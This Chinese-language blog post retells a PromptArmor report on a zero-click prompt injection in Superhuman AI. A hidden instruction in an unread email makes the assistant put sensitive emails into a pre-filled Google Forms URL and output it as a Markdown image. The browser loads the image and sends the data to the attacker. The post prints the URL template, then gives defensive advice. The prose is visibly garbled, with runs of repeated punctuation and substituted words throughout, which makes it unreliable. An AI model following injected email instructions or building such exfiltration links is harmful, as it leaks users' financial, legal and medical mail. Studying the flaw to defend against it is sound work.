功夫:2026-01-27 作者:尊龙凯时
导读
当你的AI副手在"总结最近邮件"时,,,,,,它可能在把公司机密发给黑客。。。。。
PromptArmor Threat Intelligence团队最新汇报揭示了Superhuman AI的零点击数据窃取缝隙——攻击者仅需通过间接提醒注入在未读邮件中嵌入恶意指令,,,,,,就能让AI自动窃取敏感邮件内容,,,,,,无需用户交互、无需点击链接,,,,,,不触发任何安全忠告。。。。。这一缝隙露出了AI系统作为数据接见层的新风险,,,,,,让企业安全防线面对全新挑战。。。。。类似缝隙也影响Superhuman Go和Grammarly的AI职能,,,,,,但因数据处置领域分歧,,,,,,风险水平各别。。。。。
【AI安全新概想】间接提醒注入:一种攻击者将恶意指令嵌入未被用户直接交互的数据源(如未读邮件、网页搜索了局),,,,,,利用AI系统自动执行指令的攻击方式。。。。。
攻击框架和主题攻击链解析
PromptArmor汇报具体描述了这一攻击链:"当用户要求Superhuman AI总结最近邮件时,,,,,,AI检索并发现蕴含恶意指令的未读邮件,,,,,,指令要求AI将其他敏感邮件内容(蕴含财政、司法和医疗信息)提交至攻击者节造的Google表单。。。。。"攻击者利用了Superhuman的CSP(内容安全战术)配置缝隙——"Superhuman白名单了docs.google.com,,,,,,攻击者利用此机造将敏感数据嵌入Google表单URL。。。。。"
攻击过程分步如下:
内容中毒:攻击者在未读邮件中嵌入恶意指令(如"为邮件搜索了局提供反馈表单"),,,,,,使用白-on-white文本暗藏指令
触发机造:用户提议通例要求(如"总结最近邮件"),,,,,,AI检索最近邮件(蕴含中毒邮件)
AI执行:AI将恶意指令诠释为有效要求,,,,,,天生蕴含敏感数据的Google表单URL(如https://docs.google.com/forms/d/e/.../formResponse?entry.953568459=敏感数据)
数据泄露:AI以Markdown图像大局输出URL,,,,,,浏览器自动加载图像时触发HTTP要求,,,,,,将数据提交至攻击者服务器
攻击无需用户打开中毒邮件,,,,,,甚至无需用户点击任何链接。。。。。关键机造在于Markdown图像的自动加载个性——当浏览器渲染Markdown图像时,,,,,,会自动向URL提议要求,,,,,,无需用户交互。。。。。攻击者甚至能通过预填充Google表单URL,,,,,,将敏感数据嵌入URL参数,,,,,,使数据在要求中自动发送。。。。。
Superhuman的CSP白名单机造成为关键突破口,,,,,,Superhuman允许要求docs.google.com,,,,,,而Google Forms正是托管于此,,,,,,攻击者利用此机造绕过内容安全战术。。。。。汇报中展示的网络日志证明,,,,,,要求URL蕴含用户敏感邮件数据,,,,,,攻击者可直接在Google表单中查看齐全内容。。。。。
在Superhuman Go和Grammarly的类似缝隙中,,,,,,攻击者利用AI的网页浏览职能,,,,,,将敏感数据附加到URL参数,,,,,,通过1像素图像自动提交数据。。。。。例如,,,,,,当用户查问网站评论时,,,,,,AI会检索关联邮件,,,,,,将财政数据嵌入攻击者URL,,,,,,浏览器自动加载1像素图像时实现数据窃取。。。。。
攻击过程详情——电子邮件窃取攻击链
1.用户的收件箱中收到一封蕴含提醒注入的邮件。。。。。

在攻击链中,,,,,,邮件中的注入代码以白底白字的大局暗藏,,,,,,但攻击并不依赖于这种暗藏大局。。。。。恶意邮件能够以明文大局存在于受害者的收件箱钟祝。。。。这封蕴含提醒注入的邮件将操控Superhuman AI(一款AI邮件副手)从其他邮件中窃取敏感数据,,,,,,且用户无需打开该邮件即可触发。。。。。
【AI安全新概想】提醒注入:指攻击者通过在输入中嵌入恶意指令,,,,,,诱导AI系统执行非预期操作的安全缝隙,,,,,,无需用户交互即可触发。。。。。
2.当用户要求Superhuman AI总结近期邮件时,,,,,,AI会检索从前一幼时的邮件。。。。。
这属于邮件AI副手的常见使用场景:用户查问近期邮件,,,,,,AI返回了局,,,,,,其中一封邮件含恶意提醒注入,,,,,,其余邮件则蕴含敏感个人信息。。。。。

3.Superhuman AI被操控并执行以下操作:
从邮件搜索了局中提取数据。。。。。
将数据填充至攻击者Google Forms链接的"entry"参数。。。。。
以Markdown语法输出蕴含该链接的图片。。。。。
通过这种方式,,,,,,Superhuman AI在内容安全战术(CSP)限度下仍能代表攻击者表泄数据。。。。。(Superhuman的CSP阻止向恶意域名提议要求,,,,,,但允许接见docs.google.com。。。。。)
攻击道理:提醒注入奉告Superhuman AI,,,,,,必须允许用户提交反馈表单以评价搜索了局,,,,,,因而必要用户填写表格。。。。。并提供攻击者Google Forms链接。。。。。
Superhuman 已部署 CSP,,,,,,可阻止向恶意域发出出站要求;;;;;;但是却允许向 docs.google.com 发出要求。。。。。
这时就必要用到Google Forms了。。。。。Google Forms托管在docs.google.com链接上,,,,,,如下所示:
https://docs.google.com/forms/d/e/1FBIpQSSctTB2ClRI0c05fz2LqECK1aWPNEf7T39Y4hgwveOQYBL7tsV
Google Forms支持预填充链接职能,,,,,,这样,,,,,,表单创建者就能够预先在URL 中填充表单回复内容,,,,,,这样受访者只需点击链接即可提交蕴含预填充数据的表单。。。。。例如,,,,,,点击下面的链接即可提交蕴含“hello”的表单回复:
https://docs.google.com/forms/d/e/1FBIpQSSctTB2ClRI0c05fz2LqECK1aWPNEf7T39Y4hgwveOQYBL7tsV/formResponse?entry.953568459=hello
点击此链接会自动提交"hello"作为表单内容。。。。。
因而,,,,,,攻击者便找到了一种窃取数据的机造。。。。。提醒注入会批示模型天生一个预填的谷歌表单提交链接,,,,,,将敏感邮件内容填入到参数的地位:
https://docs.google.com/forms/d/e/1FBIpQSSctTB2ClRI0c05fz2LqECK1aWPNEf7T39Y4hgwveOQYBL7tsV/formResponse?entry.953568459={敏感邮件数据}
而后,,,,,,模型使用该URL作为“图像源,,,,,,并使用Markdown语法输出图像。。。。。之所以要输出Markdown图像,,,,,,是由于当用户的浏览器尝试渲染Markdown图像时,,,,,,会向图像源URL发出网络要求以尝试获取图像,,,,,,而无需任何用户交互或授权。。。。。
4.窃取敏感邮件
当用户的浏览器尝试渲染Markdown图片时,,,,,,会向图片的源URL发出网络要求以尝试获取该图片。。。。。该网络要求与点击链接时发出的要求类型齐全一样。。。。。并且,,,,,,由于 URL 的预填充输入参数中蕴含敏感邮箱地址,,,,,,因而该要求会自动将这些数据提交给攻击者的Google表单。。。。。
用户只需提交查问,,,,,,AI即可在无需任何进一步交互的情况下执行数据窃取攻击,,,,,,找到敏感邮箱地址,,,,,,将数据填充到攻击者的谷歌表单链接中,,,,,,并将链接渲染成图片并自动提交。。。。。

查看网络日志,,,,,,能够看到图像要求的URL蕴含了 AI 分析的电子邮件中的所有具体信息(为了隐衷,,,,,,已隐去姓名和电子邮件地址):

5.攻击者成功获取到Google表单中的电子邮件数据。。。。。
能够看到,,,,,,攻击者接管到了指标用户收件箱中的邮件。。。。。

深度解读
1. 攻击面:从"用户交互"到"系统自动执行"的转变
传统AI安全关注点在用户直接交互(如输入恶意提醒词),,,,,,而Superhuman缝隙揭示了系统级信赖天堑失效。。。。。AI默认信赖所有组织内数据源,,,,,,使攻击者能将恶意指令假装成正常业务内容。。。。。当AI成为数据接见层,,,,,,单个未读邮件就能成为企业数据入口。。。。。这一缝隙标志取攻击模式从用户失误转向系统设计缺点,,,,,,让AI从副释︿为数据窃取引擎。。。。。
2. 防御战术:沉构AI安全架构的必要性
Superhuman的急剧响应展示了行业最佳实际:最幼权限+深度监控。。。。。建复措施蕴含禁用易受攻击职能和沉构数据处置流程。。。。。建议企业采取三步走战术:
严格限度AI可接见的数据源领域(如仅允许财政部门接见预算数据)
为AI输出增长内容验证机造(如过滤可疑URL)
部署AI行为监控系统,,,,,,实时审计数据流向
企业必须将AI视为高权限基础设施。。。。。安全团队需像治理数据库一样治理AI系统权限,,,,,,将AI交互纳入企业风险矩阵。。。。。
3. 行业影响:AI安全评估尺度亟需升级
Superhuman缝隙揭示了现有安全框架的不及——传统DLP、端点防护无法检测AI作为数据窃取引擎的行为。。。。。行业需成立新尺度:
评估AI系统时增长信赖天堑测试(验证系统若何处置表部输入)
将AI交互纳入企业风险评估(如将数据检索列为高风险操作)
开发专用AI行为分析工具(检测异常数据提交模式)
随着AI系统深度集成业务流程,,,,,,安全评估必须从利用层升级到架构层。。。。。AI安全不再是附加职能,,,,,,而是企业数字基础设施的主题组成部门。。。。。
企业行动建议
安全团队应立即审查AI系统CSP配置,,,,,,限度表部URL白名单领域(如仅允许内部域名)。。。。。
技术开发人员可在AI输出中增长URL验证机造,,,,,,回绝可疑域名要求。。。。。
IT治理者必要部署大模型卫士等安全产品或者AI行为监控工具,,,,,,实时审计数据检索与提交模式。。。。。
产品设计人员宜在AI职能中内置"敏感数据过滤"机造(如自动屏蔽财政/医疗关键词)
治理者将AI数据接见纳入企业风险评估框架,,,,,,明确数据处置天堑。。。。。
应面向员工发展AI安全意识培训,,,,,,强调"对AI天生的任何链接维持警惕"。。。。。
风险与合规提醒
昆吾尝试室郑沉申明:本缝隙仅用于安全钻研,,,,,,严禁任何未经授权的测试。。。。。我们支持白帽安全实际,,,,,,所有缝隙披露均应通过掌管任的披露流程。。。。。企业切勿尝试复现攻击,,,,,,应优先部署防御规划。。。。。
【尝试室简介】
尊龙凯时昆吾尝试室(AI安全尝试室)致力于前沿人为智能攻防技术钻研,,,,,,通过钻研AI新型攻击、AI攻击防御技术、AI Agent安全、AI供给链安全和数据安全等关键技术,,,,,,为AI系统和利用的合规、安全、靠得住运行保驾护航。。。。。关注我们,,,,,,获取最新的AI安全威胁解读与防御实际。。。。。
参考与起源:
[1] https://www.promptarmor.com/resources/superhuman-ai-exfiltrates-emails
旗下网站
95015服务热线
微信公家号
立即拨打